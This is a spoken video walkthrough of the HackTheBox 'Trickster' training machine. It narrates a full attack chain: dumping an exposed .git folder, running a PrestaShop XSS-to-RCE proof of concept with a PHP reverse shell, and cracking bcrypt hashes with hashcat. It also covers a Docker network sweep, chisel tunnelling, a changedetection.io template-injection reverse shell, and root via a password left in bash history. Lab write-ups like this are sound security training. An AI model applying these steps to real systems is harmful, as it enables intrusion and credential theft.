Hello everyone and welcome back to the Zero Day Gym. Today I will show you how to do Trickster box from HackTheBox. Let's begin. So I've already ran my nmap scan, but the command I ran was nmap tacsc tacsv tacvv tacoa to output all formants to nmap scan, and then against the IP address of 10.10.11.34. So our nmap revealed to us that there is only two ports open, the first one being 22 SSH, the second one being 80 HTTP, and our TTL tells us that it is Linux server because it's around 64, and we can see that it is redirecting us to trickster.htb. So I'm going to add this to my etc host file, so vim/etc/host, and then I have to run it as sudo, and then add in the 10.11.34 and that domain that we were redirecting to, and let's see what is happening on this domain. So http trickster.htb, and we can see that it's just a site which is telling us at trickster.htb we bring you an exceptional online shopping experience. Our platform offers blah blah blah, right? So before enumerating this website, I always like to run another nmap scan to scan all of the ports. So sudo nmap tag p dash, right? Then our IP address, which was 10.10.11.34, then -vv, and I think that's it. So I will just run the full port scan to see if there are any more ports open, and let's begin enumerating this website. So intro is not redirecting us to anything. There's work, there's about, there's contact, and if you look at the bottom left hand side, there is this little box that shows us where we are getting redirected to. So these are not doing anything, but the shop is redirecting us to shop.trickster.htb new subdomain. So we will add it to our host file again. And we can see that all of the other ports are closed, only the 80 and 22 is open because our nmap is finished. So let's now add it to our host file, sudo vim/etc/host, and then add this subdomain, and let's see what it has to offer for us. So we are being brought to this shopping website, as we can see, and looking through it, there's a sign-in option. I will take a look at that. Then going down, there's some just text, nothing interesting, but at the bottom we can see that there's email us at admin@trickster.htb. So I'm gonna start a readme file, vim notes, or just notes, and first I will type users, and I will keep track of the users I found on the box, and I will paste this admin email address. And actually I will not quit this, I will just create another Vim window, not Vim, Tmux window. And before enumerating anything else, I will just quickly run a directory brute force against this website. So ff /op/seclist, then discovery, web content, raft-large directories.txt, I think, yeah. Then our URL will be shop.trickster.htb and fuzz keyword, so ff knows where to fuzz. And as we can see, we get all of the pages with status 403, Did I type in everything correctly? Let's see, if I go to anything that doesn't exist. Yeah, okay, I think everything is correct. And so I'm going to filter by size with tool 3. And later on, we will realize that actually FF isn't giving anything for us. I think it's just the part of the box which is tricking us, because it's like Trickster box. My assumption, but yeah. So moving on, there is this website, and I always like to check for default stuff before enumerating anything further. So let's just take a look at robots.txt, maybe there's something. And yeah, we can see that there's a lot of paths that are not allowed and that are allowed as well. But looking at the first one, there is a disallowed for .git directory, which shouldn't be exposed for sure. This is the one that I'm going to look at first, and all of these other ones I will look at later maybe. So let's go to /.git, and yeah, we can see that we have a git directory, and there are a lot of stuff on this directory. So if you haven't seen, in the last video I have shown you how to actually hack .git directories, and I definitely recommend checking this video out. I will link it on the top right corner or in the description. So what I will do, I will go to GitHub and I will download a git dumper tool, which is basically a tool to dump .git directories. So the git dumper GitHub. Let's see. I think it's this one. Yep, it is this one. So I will just copy this command and I will paste it. Yep, so FF isn't finding anything. So I will just stop it and oops, it didn't copy. Let's try this again. I will install it with pip, and for this example I will just break system packages, but this isn't recommended. If you're running it on your main box, just use virtual environment. And I will install git dumper, and I will copy this URL, and what I will do, I will make their git, and then use git-dumper with this URL and dump it to /git. And let's see, I think it is working. Let's wait for it to finish. It should be relatively quickly. Okay, so our git dumper finished dumping, and let's see to git directory, and what we have is of course this .git, but what is more interesting for me is that we have a bunch of more files, including this folder called admin 634 something, right? And I think that if we have this file, this could be a directory on a website maybe. So I will try to navigate to it. Let's see. Oh, of course without a dot, and with HTTP as well. HTTP, and yeah, we get redirected to PrestaShop 8.1.5. And let's see. I will just go to .git. Okay, so let me see if there's any commits, git log, and there's only this one commit, so it's probably just creating. Let me try to git show and type in this commit, and there's a lot of stuff. I will try to search for like password. Pattern not found. Password maybe. Let's see, is there anything interesting? There's a lot of stuff. I can't really find anything that is like a password, and we're on the top. So let me first take a look at this PrestaShop directory, and I can see that this website is using PrestaShop version 8.1.5. So if I see a version, I always like to Google, is there any CVs related to this version? So PrestaShop 8.1.5 CVs maybe. Let's see, I see that there are at least 2 CVs. So one is 34717 and 34716. Let's see, 717 is medium severity, and it is, what is it doing? I don't think it's very interesting. And this 3.4, oh, okay, we can see that there's it gets remote code execution. Let's see, do we have to be authenticated for this exploit? And I will just type in exploit. Maybe there's a proof of concept. Okay, there's something on GitHub. Let's open a few of these links. Okay, there is something here. Let's see. We install requirements, and our usage is URL, email address, a local IP admin path, and it is exploiting this CV probably and getting our reverse shell. As I can see, there's a local IP. So yeah, let's try this exploit. When I solved it, I haven't tried doing this particular exploit, so let's see if it will work. Git clone this CVE. Let's cd to this directory, and it looks like there's some HTML, so probably we are doing XSS where admin hits our exploit.html and then maybe gets our reverse shell like that. So let's see, vim exploit.py. So let's analyze what this is doing. We parse our arguments to the script. This doesn't look like we have to change anything else in here. Okay, we open this exploit.html. Then we provide attacker port, so we will probably have to run our reverse shell on port 5000. So actually, let me just do that. nc-lvmp port 5000, maybe. Then we see that we probably somehow make that our XSS take this malicious.zip file, right? And then let's see. It opens this shell template.php. Oh wait, maybe a reverse shell is on 1, 2, 3, 4, 5. Let's see. There's some sort of contact us. Let's see if there's this contact us on our page as well. http:/contact us. Yep, there it is. It's probably uploading this contact us page here. Not contact us page, but maybe that XSS. Then we go to Teams next reverse shell new.php. Then we see that there is netcat. Yep, so we don't even have to start our listener, but I'm gonna do it anyways. On port 1, 2, 3, 4, 5. And with that 5000 port, it's probably our server where we have that exploit.html. Let's go down. And yeah, I think that's it. I don't think we have to change anything here in particular. Let's try to see that exploit.html. And we probably have to specify stuff here, like base URL. So our base URL will be http 10.10. Oh no, shop.trickster.html on port 80. Admin path will be that path which we were on earlier, this one. Attacker IP is 10. I don't remember my IP. Let's see. My IP is 10.10.14.94. Port. Let's see. I will start the listener on port 5000 and file name of theme. Is this the file of theme? Maybe it is. Let's see. Let's paste it here and let's see, do we have to change anything else? It's getting like extracting CSRF tokens. It's checking if the theme was imported successfully, and I don't think we have to change anything else in this .html. Let's see, we have to install requirements, so pip install -r requirements.txt. For this one, I'm just going to create virtual environment, so Python 3-m then v, and then after it finishes creating source, then v /bin/activate, and then let's try installing the requirements again. Okay, it finished. Now let's see what's in this PHP script. So when reverse shell template PHP, and yeah, it's that very famous PHP reverse shell template. So let me change IP to 10.10.14.94 and the port to port is, I think, what am I listening on? 1, 2, 1, 2, 3, 4, 5. Do we have to change anything in ps.zip? Open ps next theme. I think reverse shell maybe. Let's see. Probably yes. So I'm just gonna do 10.10.14.94 and 12345, and then update, save, and then exit. And let's try to run this exploit. So I'm gonna stand up my Python HTTP server in this folder with port 5000, right? And then let's try running Python 3 exploit.py. Okay, and dash URL HTTP shop.trickster.htp, then dash email, maybe that email that we had in our notes. I'm just gonna copy it, yes, and then paste it here, and then dash local dash IP will be 10.10.1494, and then dash admin dash path will be our admin path, which is this one. Let's try running it. No such file or directory ncat. So probably I don't have ncat installed. Let me sudo apt install ncat. And then run this exploit again. Okay, so I figured out what the problem was, why my server wasn't working. So basically, it's because I had this netcat listener, so I just stopped it and now it started working. So let me try running this exploit once again. Okay, and it gives some sort of error. I don't know if it's bad or not really bad. Let's see what this error tells us. Okay, so what we can see from the script that starting exploit on these paths, and we are sending get request to this page. This is our reverse shell new.php, which we modified, and probably we are waiting for admin to hit us on this HTTP web server, and if he does hit, then probably XSS will trigger and we will get remote code execution by accessing this reverse shell page. And let me just stop the video, and if I get a hit, I will come back. So I will sleep for like, let's see, sleep for like 300 seconds maybe. I'm not sure how long this is gonna take, and I will come back if I get a hit. I don't think our attack was successful, as I haven't gotten a shell yet, and our connection hasn't been hit, so I will try a different exploit. So let's see. We were on this page, so there are two forks. Let me see this other POC, and it looks relatively different, but almost the same. I will try to clone this one as well. Get a clone. Let's see. I will just make their exploit, cd exploit, and then git clone this CVE, and then cd CVE. We have requirements.txt as well, so pip install -r requirements.txt. This is looking relatively the same. Then let's try seeing what is our exploit.py. So our host URL, email. This is different because we didn't have message content in the previous exploit. and exploit path as well. But it looks a bit better than the last one, so I will try utilizing this one instead of that other one. Do we have to change anything here? I don't think so. Let's go to exploit.html, and we have to change base URL path. So base URL will be shop.trickster.htd with port 80. Path will be our admin path, so somewhere, yeah, here. And then our host IP address, HTTP server IP, will be 10.10.1494. We will stand up a HTTP server on, let's see, exploit CVE Python 3 HTTP server on port 81 with sudo, and we will, this file name is fine, and everything else looks probably fine. Then I will open PS, and I will change in the reverse shell my IP address as well as port. And port is, let me just go with quad 5s and then save this, update. And yeah, I think it's fine. Exploit, let's try running this exploit. HTTP shop.trickster.html on port 80. Email is this email, so let's copy this email, and message will be just hey prop, maybe hey. Have to HTML files, so /home/nitrogenxp/ this path maybe. Let's see, /HTTP Trickster, and exploit.html. Does it want the HTML file or just the path? Let's see. Okay, it started. Can I run the netcat listener on quad 5? I maybe can. Okay, let's see, will it work now with this other? I will sleep for 120 seconds now, and I will come back if I get a hit or so. Okay, and the 2 minutes have passed, and I got a GET request to my HTTP server, and as you can see, it probably hit this page but didn't show for some reason. I don't know, but okay, I will just interrupt this listener. Okay, so we got a reverse shell, and let's see. I will first of all just stabilize the shell to get a full TTI and up and down arrows and things like that. So Python 3-c import pti pti.spawn/bin/bash, and then Control Z SCTI raw minus echo and foreground or g, and then export term is xterm, right? And okay, so I have stabilized my shell, and now what I like to do when I'm dub data. So first I will run cat/sc/passwd to see what other users are there. So I can see there's some sort of user runner, then James, and of course root. Is there anything else? No, it doesn't look like it. Let's see, can I access something on /home? No, I can't. There isn't anything. So when I'm data, I probably always have access to /var directory. And let's see, let's go to www. And I have access to this Trickster, so it's probably not important to me. Oh no, wait, do I have to PrestaShop or Trickster? Let's see. Let's cd to Trickster. Oh no, I don't have access to neither of these. I don't think so. cd assets, let's see. I just want to find things like databases because they expose credentials a lot of times. I don't really see anything too interesting here, so let's go to HTML. And the box is lagging, I think. Oh, cd HTML. There's index.html, and this is the page. Oh, this is the page that we got redirected to. This is just that the page trickster.html. I think it's this one. It's not important for me, so let's move on to PrestaShop. And we had this admin. We can see there's a config, so configs are interesting to us. So let's see the config, and let's see what do we have here. There are a lot of config files. Let's try to see some of them. I don't think it's interesting for us. I think these are just configs from these what is it called, technologies that websites use. I'm okay with that. I haven't used Vapalizer yet on this machine, so this uses PrestaShop, so probably has some sort of configs like that. I don't think it's interesting for us. Let's move on to app, maybe. cd app and config. There are some sort of configs here. Let's cat out cat config.yaml. Is there anything interesting for us here? No, I don't think so. Let's see. These are all YAML files, but there's parameter.php and then set parameter.php. Let's see what's in parameters. Oh, and I instantly see that there's some sort of private API key. Let's see. There's a public API key. And what do we have here? We have database user and password. So what I will do is I will just copy these both and put them to my notes. So let's see, it didn't copy for me, for example, for some reason. I will just do it once again. And database name and database user and password, right? Let's see. Let's paste it, and there are some spaces, whatever, it's fine. Okay. Let's try to authenticate to MySQL these credentials. So MySQL -u, so PS user, I think it was. Yeah, and I will copy the password like that, and -p to enter the password myself, and we get authenticated to MariaDB, right? Oops, I didn't mean to do that. Okay, so show databases. Let's see, there's information schema and PrestaShop, so I will use PrestaShop and show tables. Show tables once again because I can't type. And there are 276 tables here, so we have a lot of work to do, I think. Because we don't really want all of these tables, we just want the ones containing like users or passwords. So let's see, is there like users table? I probably should have cleared my terminal before entering this, so I will do that now. Exit, clear, then let's authenticate once again, and then use, wait, what was the database name? Show databases, use PrestaShop, and use PrestaShop, and then show tables, right? I always forget that semicolon in the end. So let's see, let's search for like, okay, let's search for like users. There aren't like any users tables. So let me just scroll myself and I will mark the tables that I seem interested in, maybe PS supplier, to my notes. Okay, so let's see. The interesting tables, and then I will just PS supplier. Let's see what else. Maybe profile. Maybe product supplier. There's probably a faster way to do this, but I don't really know that way, so I will just go through them manually. Comment, nothing really interesting here. If it was the penetration test, I would definitely take a look at like orders or things like that, but we want to escalate our privileges on this box, so we are not really interested in that. Okay, there's mail, there's log. I will just ps_mail, ps_log. Maybe ps_employee session and employee. Yes, employee session, and I will, let's see, let me finish. I'm just looking really quickly through these. Is there anything else interesting? I don't really think so. Let's see, let's select start from, first of all, PS supplier. Oh my god, I'm so slow. Okay, I will just do it, man. PS supplier. Nothing interesting. PS profile. Nothing here. PS product profile. Product supplier, right? Product supplier, maybe. Let's see what's in here. Nothing too interesting. PS mail. ps log. Then there are a lot of logs here. Let's see. We'll just scroll quickly through these. Maybe there are like credentials or something in here. Nope. Okay, so the next one is PS employee, and in PS employee we have what seems to be hashes, in particular I think bcrypt hashes probably. So there are two hashes for admin at trickster.htb and james at trickster.htb. So I'm just gonna create a hashes.txt file, and the first hash is admins, and the second hash is Adams or James. Yeah, James. And I will try to crack it with hashcat. So hashcat dash a for attack mode 0 dash, I don't remember what the mode is. I think for bcrypt it's like 3200. Then a hashes.txt and slash user slash share slash wordlist slash rocku. Do I have rocku? I have to extract this rocku.jz. Let me do that really quickly. Slash user share wordlist. Okay, I extracted my rocku file, so rocku.txt now it should work, and the hashcat is starting. We will we specify the mode, and I knew that it is probably bcrypt because it started $2e$, and this is the indicator of a lot of times of bcrypt. I really can't be sure, but yeah. So if something cracks, I will come back to this hashcat and I will let it run for now. And let's see. Okay, it started cracking. It will probably crack pretty slow because I am running on my virtual machine. I shouldn't be doing that, and I should have, and it is recommended to crack passwords on your local machine, not on VM. But first, before let me just wait for them to crack. Okay, so as I told you, the hashes cracking is taking forever to run on virtual machines. So what I will do is I will go to my Windows computer on my host machine and I install hashcat in it. So, and I put my hashes into hashes folder. So hashcat-a0 for attack mode 0 -m3200 hashes/hashes.txt, and then I have my rocku.txt in this folder. So I will start hashcat. Let's see. Okay. So my hashcat is starting. Let's wait for it to initialize our devices. It should be relatively quickly. Okay, so it started cracking, and let's see. We already retrieved 1 out of 2 hashes. So yeah, as I told you, it takes forever to run on VM, and I was waiting for like 10 minutes and it hasn't cracked. So what I will do is I will go and type in delete all of this -m3200 hashes/hashes cracked.txt and then dash dash show. And what cracked is hash that ends with C and M, and the password is always and forever. So let's see, let's go back to our box, and what I will do is go to this, and the password that cracked is CMM, so it's James' hash. So the first thing when I get a password, what I do is I try to connect as that user, so SU, and what happened here? I think the box reset, so that's a bummer. I will let's see, can I ping the box? http shop.trickster.htb. I can't specify HTTP. Yeah. I can ping the box. So let's try to SSH, because we had SSH port open. So SSH James, because we saw the James user exists on the box at 10.11.34, and the password is always and forever. And yeah, we can SSH to the box as James user. And let's cd to our home directory, and we have the user.txt flag. So now we are James, and the first thing what I will do is see, is there anything interesting in my home directory? I don't think so. So let's just run basic enumeration. So uname -a maybe. I could have already ran as the user before, but whatever. Like, so the box is from 2024, so there shouldn't be like any old exploits. Let's see if we can run anything as sudo. So always and forever. It seems we cannot run anything as sudo. What else? Let's try looking at what our user can do, maybe. So uname, not uname, I'm sorry, find /user James. I don't remember the syntax. Grep -v for proc, grep -v sys, does it have to be in quotes maybe? No. Okay, whatever. I will just try. Let's see, do we have any like ports open that we can access? LNTP. Let's see, we have 3.2. Can we maybe ping this? Ping curl page not found. Okay, let's see, is there any like interfaces? And we can see that there is a Docker running on this box, and we haven't seen it before, I don't think. So let's see, let's try running like Docker ps to list Docker sessions, but we get a permission denied. And in this box, we don't really have any way to enumerate Docker, so we will just have to enumerate this CIDR, which is this port range 172.17.0.1. And the first thing that I will do is I will run like a bash script that I will create a bash script that finds all the IP addresses that are open, that are pingable. So I will do for a maybe in sequence sequence 0 to 254. So what it will do is create an A variable which will be from 0 to 254, because if you don't know, /16 allows ports to, not ports, IP addresses to be assigned to this number from 0 to 254 and to this number from 0 to 254, right? So this will be the first variable. So I will put it in this spot to check if there's like from 0 to 254 in this spot. Then what I will do is do another for loop for and what this $sign does is it allows me to basically just run a command inside like a function and sequence from 0 to 254 as well, and then I will do ping this IP address, so it's 172.17. and then $A for this variable and $I for this variable, and then ping commands, if they are successful, return from and yeah. Oh, and I will add to ping command -C1 and -W1, so it like only pings once, so it's faster. And for it to become even more faster, I will just put a $sign and then, oh no, ampersand, no $sign, done, and then again. I'm not sure if I need these two $signs or only one. And then I will grab from, so I know which IP addresses exist, because if I get a ping back, it will have from in its response. So I will enter. Okay, so I have these two IP addresses. So the first one being 172.17.0 and 1, and then the other will be 2. I will not wait for it to finish, and I will start enumerating these ones. Okay, so what we will check first is this one. So like, let me like check it with nmap. Do we have netcat? Not nmap, netcat. And yeah, we have netcat. So what I will do is maybe like netcat and -vz, and I will try to connect to that IP address on some sort of like 172.17.0.1, and then the port will, let's try a port that will not exist probably. I hope I don't guess like some sort of port. And let's do 0 ampersand 1 and then grep -v. No, wait. I will not grep for anything just yet. And let's see. Oh my god, the box is super slow. Okay, and we see that connection refused, and let's try port like 80. And we can see that it succeeded. So we can grep for succeeded. And if we type in anything that doesn't exist, and we don't get anything. So let's try to curl 172.17.0.1 and port 80. And yeah, we get redirected to trickster.htb. So this is the IP address of our website that we checked before. So it's not probably interesting to us. What is interesting is this other IP address that we haven't looked at before. Let's try to curl to that IP address. and we see that failed to connect. So what I will do is I will try to find what ports are open on this IP address. So let's type in .2, and I will do from port 1 to, let's do for now like 20,000, and I will graph for succeeded. So it only shows us that ports which were successful to connect to. Let's try. We can see that port 5000 is actually open. So let's try to curl that 172.17.0.2 and port 5000. What's wrong? Oh, I'm trying to connect. Wait. Am I stupid? Yeah, I am stupid. Okay. So it's redirecting me to some sort of login page. Okay, so this is really interesting for us. So what I will do is I will use a tool called Chisel to basically be able to connect to this IP address from my local machine. So to install Chisel, you just have to go to Chisel GitHub page, and let's see. Let's wait for it to load. And to install it, you just have to type in go install and then this GitHub link. Let's wait for it to install. While it's installing, I will go ahead and create a www directory and cd to www, from which I will send my files to this machine. Okay, so it installed, so I will copy /home go bin and then chisel to /www, and then in www there should be chisel, right? So I will stand up my Python server, python 3-n/http.server, and I will wget http 10.10.14.92 port 8000/chisel. I probably had to, oh no, it's fine. We can see it in our home folder. So I will chmod +x chisel, and on this machine, so first of all, with chisel, we have to go to our main machine and basically create a reverse connection so our box can connect back to our machine. So what we have to type is chisel, and we create our server on our main machine, and type in -- reverse to allow reverse connections, and -port, let's just port 8050 for example, and then enter. I have to type in /chisel, and on our on our victim's machine, we have to run chisel as a client, so /chisel client, and then our port, so 10.10.14.94, and port 8050 because we specified 8050 here, and then we have to say reverse, then what port we want to reverse, so port 5000, then 172.17.0.2, and then 5000 again, and then click enter, and let's see, we got a connection back from this machine. So can we now ping our local host 172.0.0.1 port 5000? Let's just try to go to that web page in our browser. So localhost 5000. Yep, and we can go here. Immediately, what I see is we can type in password, and I see that this is some sort of change detection.io. Maybe it's a plugin or something. I'm not sure, and we can see version, some sort of version here. So before that, let's try to log in with some default passwords like admin, like password, or maybe that password that we found earlier that we cracked, which was always and forever, I think. And yeah, we can log in with always and forever. You can see here. And okay, let's try looking for any vulnerabilities on this change detection.io plugin, or like something. I'm not sure what it is. So change detection.io version. Oh my god. Version this and exploit or CV. Let's see. And we have remote code execution on exploit.db. No, it's not affected on this server. Or is it? Wait. I'm not sure. Is it a CVE, CV32651? Okay, let's try this. Listening on port, connection received. Let's see, what is it doing? Let's see, maybe there's like an explanation on GitHub. Server-side template injection allows for remote command execution. Okay, let's try some sort of I will try to I will create this and search exploit for change detection. I don't have search exploit. Well, that's embarrassing. I will just view raw and copy them, and I will just wget. So cd exploit, because I created a directory before, wget this, and move to exploit.py, and let's try to run exploit.py. Source /venv. Do we have venv here? No. Where was venv? Git venv? No. Okay, I will just install phone because I know this module. It should be fine. Click install phone --break -system. I think. No. Okay, it's downloading. It should install really quickly because it's a small module. Okay, and Pwn has installed, so let's try running this exploit. Okay, what we have to specify is --url, --port, --IP for. Okay, so exploit --url will be http 127.0.0.1 port will be 5000 --IP. Let's see. Let's stand up a listener on port like 6666. 10.10.14.94. What else? We shouldn't have to specify notification, but I think it's not working because let's try it again. Listener port. What kind of port is for a listener? dev start listener port. Let's see, listen port. I think we specified listen port. I think we have to run it like this. Port 5000 and then port 6666. Let's see, will it work? Address already in use. Okay. Waiting for connection on 6666. I think it isn't working because it is not authenticated to the server. Let's see if there's any different, if there are any different exploits than this one. Let's type in GitHub. Let's see. There are some exploits. This one, oh, this is not an exploit. Let's see, is there like a proof of concept? There is a proof of concept. Maybe? It just shows how it works. It tells an impact. Let's see, are there any other? I think there should be at least one more in GitHub or somewhere. What kind of C? Let's just search for exploit for the CVE. Yep, and there's some sort. Okay, there are GitHub pages now appearing. Okay, there's some sort of exploit here. Let's try. I don't think it will work. I want an exploit which is authenticated, and I think there is one, at least one. Let's see, there are forks for this one, maybe this one. This one doesn't authenticate as well. Let's see, GitHub. Because some of these exploits I have tried and they didn't work for me when I was solving this box initially, and I can't get them to work really. And there's one exploit which is actually authenticating user before exploiting. Okay, there's some sort of, yeah, modify the script to handle logging if protected by password. Yeah, we need this one because the other exploits were basically just authenticating you. We're basically assuming that you're authenticated already to the application, and not actually like authenticating you with a password. So I will wget this exploit, wget, and then let's try running cve -20. Oh, it's with Python 3. I'm sorry. And --url http localhost. Let's listen on quad 6s. Localhost 5000 /-- port will be quad 6s. 6666 dash dash IP 10.10.40.92 and dash dash password will be always and forever. I don't think the notification is necessary. I will try not providing it. And okay, and we got a callback. There were some errors because we probably tried listening on this exploit as well. But yeah, we got a reverse shell and we probably are now Docker. Let's see, local groups. What's the command? Local groups. Or is it on Windows? I don't remember. Who am I /all? No, not /all. Who am I? Well, whatever. I am probably just a Docker. Let's see. Let's go to /home. Is there anything here? ls-la. Is there anything interesting in our / directory? Not really. ls-la here. We can see that dash history is not being piped to dev null because, for example, on James, or I don't think I can really cancel, but dash history is most of the times being directed to /dev/null, so it gets deleted every time user logs out. But in this case, it is not, so we can see the history of the commands that were being ran by this Docker container. So let's see, is there anything interesting here? I can see that there's like a comment, "You can't catch me," and it's installing stuff. Hang on. We can see that it's app updating, but every time that we run apt update, we have to specify root password. So maybe it could be like root password, this string. Let's see. What can I do? I can maybe try SSHing as root to, or I can just type in su / and then, oh no, I must be James. Yeah, su - and then the password, and the password work, and we are root, so we can go to /root and we can grab the root flag. And yeah, I hope you guys enjoyed this video. It is a bit long, but I hope you learned something, how to maybe use chisel or do things like .git enumeration. It was a really fun box for me. I really enjoyed it, and I hope you have a great day, and I will see you guys later.